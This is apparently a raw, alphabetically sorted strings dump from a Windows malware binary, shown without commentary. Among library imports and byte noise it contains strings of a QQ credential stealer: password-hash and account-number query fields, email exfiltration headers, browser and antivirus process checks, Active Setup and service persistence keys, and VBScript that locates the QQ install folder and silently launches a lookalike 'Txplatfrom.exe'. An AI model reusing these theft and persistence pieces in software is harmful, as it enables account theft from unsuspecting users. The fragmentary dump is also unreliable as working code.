lstrlenA
lstrlenW
L$,SUV
L$(SUV
L$T_^]
L$t_^d
L$t][d
L$T_^]d
L$T_^][d
|$LtE;
L$TSWQ
L$(UUh
\$lUV3
L$(VQRSP
L$(VQVj
l$@VW3
l$<VWj
L$ WPQ
L$(WQR
L$(WSR
L$X_^]3
L$x_^d
L$x_^][d
L$X_^d
L$X;L$
L$XSQh
@;l$\~Z
mailto:
MapWindowPoints
maxthon.exe
M/d/yy
MessageBoxA
MGridCells
Microsoft Visual C++ Runtime Library
midiOutPrepareHeader
midiOutReset
midiOutUnprepareHeader
midiStreamClose
midiStreamOpen
midiStreamOut
midiStreamProperty
midiStreamRestart
midiStreamStop
 (*.MID)|*.MID|
MIME-Version: 1.0
ModifyMenuA
Module32First
Monday
MonitorFromPoint
MonitorFromRect
MonitorFromWindow
MousePointer
MoveToEx
MoveWindow
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Mpr.dll
Mr.wings
MS Sans Serif
MSScriptControl.ScriptControl
msscript.ocx
MS Shell Dlg
__MSVCRT_HEAP_SELECT
MulDiv
MultiByteToWideChar
n0SSSSU
-NbkSbpS
-NbkSbpS(
nd9~dt
netscape.exe
N/f@b	g
NH_^][
Nh;NX|
-N"N1Y
N*Ncktepe
N*Ntepe
N*N(W%
N*N(W0
- not enough space for arguments
- not enough space for environment
- not enough space for lowio initialization
- not enough space for _onexit/atexit table
- not enough space for stdio initialization
- not enough space for thread data
November
nt2Ht#Ht
NtClose
NtCreateKey
NtDeviceIoControlFile
ntdll.dll
NtOpenKey
NTRPQj
(null)
N$~	WU
NX9NXu 
Nyt2S	W	w	w
nzzpenc
O(_^][
o0SSSSU
October
OffsetRect
OffsetViewportOrgEx
ole32.dll
OLEAUT32.dll
OleInitialize
OleRun
OleUninitialize
OpenClipboard
OpenDatabase
OpenPrinterA
OpenProcess
OpenSCManagerA
OpenServiceA
opera.exe
       OperationRegistry.Run chr(34)&Txpdir&chr(34),0,False
   OperationRegistry.Run chr(34)&Txpdir&chr(34),0,False
out.prn
OX[0R 
~P9~Pun
PatBlt
PathFileExistsA
PathToRegion
.PAVCArchiveException@@
.PAVCException@@
.PAVCFileException@@
.PAVCMemoryException@@
.PAVCNotSupportedException@@
.PAVCObject@@
.PAVCResourceException@@
.PAVCSimpleException@@
.PAVCUserException@@
PeekMessageA
Ph_^][Y
PostMessageA
PostQuitMessage
PPPPhd
PPPPPPPP
P<PuWSV
ppxxxx
PQj WUS
PQQQQQ
\$ PQV
#pragma code_page(936)
premium-server@thawte.com0
PreviewPages
PrivateLabel2-1440
 (*.prn)|*.prn|
Process32First
Process32Next
Program: 
<program name unknown>
P$RWPh0
~'PSQR
PtInRect
PtVisible
- pure virtual function call
PVh8nI
@PVj,S
\$PVUUS
PWDHASH:
PWh0OJ
PWVWWW
 Qizhi Software (beijing) Co. Ltd0
 Qizhi Software (beijing) Co. Ltd1'0%
QPSWVR
&qqclientkey=
            QQdir=Bakdir
            QQdir=Left(QQdir,len1)
         QQdir=Left(QQdir,len1)
      QQdir=Left(QQdir,len1)
   QQdir=Left(QQdir,len1)
QQdir=OperationRegistry.RegRead("HKLM\SOFTWARE\TENCENT\PLATFORM_TYPE_LIST\1\TypePath")
   QQdir=OperationRegistry.RegRead("HKLM\SOFTWARE\TENCENT\PLATFORM_TYPE_LIST\2\TypePath")
      QQdir=OperationRegistry.RegRead("HKLM\SOFTWARE\TENCENT\PLATFORM_TYPE_LIST\3\TypePath")
         QQdir=OperationRegistry.RegRead("HKLM\SOFTWARE\TENCENT\PLATFORM_TYPE_LIST\4\TypePath")
qq.exe
\QQ.exe
qqgame.exe
&qqhash=
qqmusic.exe
?qqnum=
QQSVW3
QQSVWd
QQSVWj
?qquid=
QQUIN:
QQUWSS
QSUVWj
QVWWRP
QX[gbL
RaiseException
RASAPI32.dll
RasGetConnectStatusA
RasHangUpA
`.rdata
ReadFile
ReadProcessMemory
RealizePalette
Rectangle
RectVisible
RedrawWindow
RegCloseKey
RegCreateKeyA
RegCreateKeyExA
RegDeleteKeyA
RegDeleteValueA
RegisterClassA
RegisterClipboardFormatA
RegisterWindowMessageA
RegOpenKeyExA
RegQueryValueA
RegQueryValueExA
RegSetValueExA
ReleaseCapture
ReleaseDC
ReleaseSemaphore
@.reloc
RemovePlayer
RemovePropA
Reply-To: %s
resource.h
RestoreDC
ResumeThread
	return arr.join('');
return str;
	return S+yarr.reverse().join('');
	return zero;
RichNM
RoundRect
|$,RPQ
RSbpS\O
RtlAdjustPrivilege
RtlAnsiStringToUnicodeString
RtlFreeAnsiString
RtlFreeUnicodeString
RtlInitAnsiString
RtlInitUnicodeString
RtlMoveMemory
RtlMultiByteToUnicodeN
RtlNtStatusToDosError
RtlOpenCurrentUser
RtlUnicodeStringToAnsiString
RtlUnicodeToMultiByteN
RtlUnicodeToMultiByteSize
RtlUnwind
runtime error 
Runtime Error!
RVPUSQ
Saturday
SaveDC
SbpS0R
SbpS@b	gu
SbpS:g:
SbpS\O
ScaleViewportExtEx
ScaleWindowExtEx
ScreenToClient
Script
ScrollWindowEx
SECURE APPLICATION DEVELOPMENT1)0'
SelectClipRgn
SelectObject
SelectPalette
SendDlgItemMessageA
SendMessageA
September
SetActiveWindow
Set Bakdir=fso.GetSpecialFolder(1)
SetBkColor
SetBkMode
SetCapture
SetClipboardData
SetCurrentDirectoryA
SetCursor
SetCursorPos
SetEndOfFile
SetEnvironmentVariableA
SetErrorMode
SetEvent
       Set F0=FSO.getfile(Bakdir)
SetFileAttributesA
SetFilePointer
SetFocus
SetForegroundWindow
Set fso=CreateObject("Scripting.FileSystemObject")
SetHandleCount
SetLastError
SetMapMode
SetMenu
SetMenuItemBitmaps
Set OperationRegistry=NoThing
Set OperationRegistry=WScript.CreateObject("WScript.Shell")
SetParent
SetPolyFillMode
SetPropA
SetRect
SetRectEmpty
SetROP2
SetScrollPos
SetScrollRange
SetStdHandle
SetStretchBltMode
SetTextColor
SetTimer
Settings
SetUnhandledExceptionFilter
SetupInstall
SetViewportExtEx
SetViewportOrgEx
SetWindowExtEx
SetWindowLongA
SetWindowOrgEx
SetWindowPos
SetWindowRgn
SetWindowsHookExA
SetWindowTextA
SHDeleteKeyA
Shell32.dll
SHELL32.dll
ShellExecuteA
Shell_NotifyIconA
\shell\open\command
SHGetPathFromIDListA
SHGetSpecialFolderLocation
Shift+F1
Shift+F10
Shift+F11
Shift+F12
Shift+F2
Shift+F3
Shift+F4
Shift+F5
Shift+F6
Shift+F7
Shift+F8
Shift+F9
SHLWAPI.dll
[Sh<nI
ShowWindow
SING error
SM+Pq*
sO;>|C;~
software
Software\
SOFTWARE\Microsoft\Active Setup\Installed Components\{AA7BE134-9ACE-2457-ABD0-3AE14579BDE1}
SOFTWARE\Microsoft\Active Setup\Installed Components\{AA7BE134-9ACE-2457-ABD0-3AE14579BDE1}\StubPath
Software\Microsoft\Windows\CurrentVersion\App Paths\360safe.exe\Path
SOFTWARE\TENCENT\PLATFORM_TYPE_LIST\1\TypePath
SOFTWARE\TENCENT\PLATFORM_TYPE_LIST\2\TypePath
SOFTWARE\TENCENT\PLATFORM_TYPE_LIST\3\TypePath
SOFTWARE\TENCENT\PLATFORM_TYPE_LIST\4\TypePath
sogouexplorer.exe
		S=parseInt(S/16);
s$Rich<
%s <%s>
SS@SSPVSS
_SSSSU
StartDocA
StartPage
StartServiceA
StretchBlt
StubPath
Subject: %s
Sunday
SunMonTueWedThuFriSat
Super-EC
SVWh	SG
SWVVVRPV
System
System\CurrentControlSet\Services
System\CurrentControlSet\Services\BREGDRV
SystemParametersInfoA
T$$_^]
T$0PQR
T$0RPQ
T$0SUV
@t4Ht1Ht_Ht
T$4j\R
t7&?ft
T$8QRP
T$8RWj
t$ 90t
t	9p$u
t&9^$t
TabbedTextOutA
T$$+D$4
tD9_Pt?
T$dPQR
T$DPQRW
T$DQRU
T$DQSR
T$DWRh
T$\;D$Xu
t(ENEN;
TerminateProcess
TextOutA
T/f&Tcknx
<]t_G<-uA
Thawte1
Thawte Certification1
Thawte Code Signing CA
Thawte Code Signing CA0
Thawte Consulting cc1(0&
Thawte Consulting (Pty) Ltd.1
Thawte Premium Server CA1(0&
Thawte Timestamping CA0
T$|hdMJ
theworld.exe
T$HhXMJ
!This program cannot be run in DOS mode.
t,hLRI
t=h`RI
t>Ht Ht
t+Ht$Ht
Thursday
T$H} VP
T$hWVR
T$,hXMJ
tI;Ftr
TimeOut
T$\jdSR
+tJHt:Ht*
TLOSS error
T$lPRh
TlsAlloc
TlsFree
TlsGetValue
TlsSetValue
t$LUPh
T$LWUQVR
tNhtRI
tn<%t2
tooltips_class32
To: %s
T$ PhH 
tPh\oI
T$ PPP
T$,PPP
T$pPQR
t$PPVS
T$(PQR
T$\PQR
T$PQRP
T$ PQWWR
T$$PRV
tq9~Dt
T$(QhXMJ
T$ QRP
T$,QRPS
T$$QRV
T$(QVURWP
TranslateAcceleratorA
TranslateMessage
tRHt}H
T$,RQP
t%RSQP
T$$RUS
t$$RVP
T$<RVW
tS9~@uN
TSA1-20
TSA2048-1-530
T$ SRh
T$,SRh
t$(SSh
t#SSUP
T$ SWRP
t!< t	<
+ttHHtd
T$Tj@P
t.;t$$t(
Tuesday
T$\URP
t$$VSS
tvWWWWU
T$\WVR
t/WWUPj
Txpdir=QQdir&"Txplatfrom.exe"
Txplatfrom.exe
 (*.txt)|*.txt|
T$XUSR
;t$Xu";\$\u
t$XWVS
?u='@^
u._^][
u29l$xu,
u"8D$yu
u]9B uX
u	9~@u
uf9=@	M
>:u#FV
uh9^8uX
- unable to initialize heap
- unable to open console device
- unexpected heap error
- unexpected multithread lock error
>:uNFV
UnhandledExceptionFilter
UnhookWindowsHookEx
UninitRegEngine
Uninstall
UNLINK
UnlockFile
UnregisterClassA
UpdateWindow
uPf9t$ v
uR9BxuM
uRFGHt
us-ascii
USER32
user32.dll
User32.dll
USER32.dll
u$SShe
u(UhTOJ
\$(UVW
UVWPS3
ValidateRect
var arr=[];var zero=0;var A;
var arr=[];var zero;var A;
	var B=Math.max(num);var Y;var S=B;var sarr=[];var yarr=[];
Variant
		var len=arr.length-i-1;
	var str=['A','B','C','D','E','F'];
VBScript
VC20XC00U
V#D$,WPQ
VeriSign, Inc.1+0)
VeriSign, Inc.1402
"VeriSign Time Stamping Services CA
"VeriSign Time Stamping Services CA0
+VeriSign Time Stamping Services Signer - G20
VerQueryValueA
VERSION.dll
^Vh<nI
Vh;VX|
VirtualAlloc
VirtualFree
visible
>V>\>j>
\$<VW3
VWhTAG
VWtp9E
VWuBhD
VWuBhxoI
V,_^[Y
;.<w<}<
W9^du-
WaitForMultipleObjects
WaitForSingleObject
waveOutClose
waveOutGetNumDevs
waveOutOpen
waveOutPause
waveOutPrepareHeader
waveOutReset
waveOutUnprepareHeader
waveOutWrite
 (*.WAV;*.MID)|*.WAV;*.MID|WAV
 (*.WAV)|*.WAV|MIDI
Wednesday
Western Cape1
	WG!2S(
WideCharToMultiByte
window
WindowFromPoint
windows
WinExec
wings.bak
WinHelpA
WININET.dll
WINMM.dll
WINSPOOL.DRV
WjdjdPQh
Wj(_Wj
|$$}$WP
(wqt\HHtS
WriteFile
WritePrivateProfileStringA
WS2_32.dll
Wscript.Quit
wsprintfA
WTWindow
|$@ Wu
"WWSh8nI
"WWShP
wwwwww
<'=<=x=
x`^^n7c"w6~
<X<p<w<
XY[Z[]
		yarr[yarr.length]=Y;
YHYtLHt9
		Y=S % 16;
:Y:t:{:
YX[(W	
_^][YY
ZA1%0#
?Z?c?i?u?z?
		zero+=parseInt(arr[i])*Math.pow(16,len);
:Z;m;x;
;&;Z;s;
|z;^<}uWS
 @zzpanelkey=
(@zzpaneluin=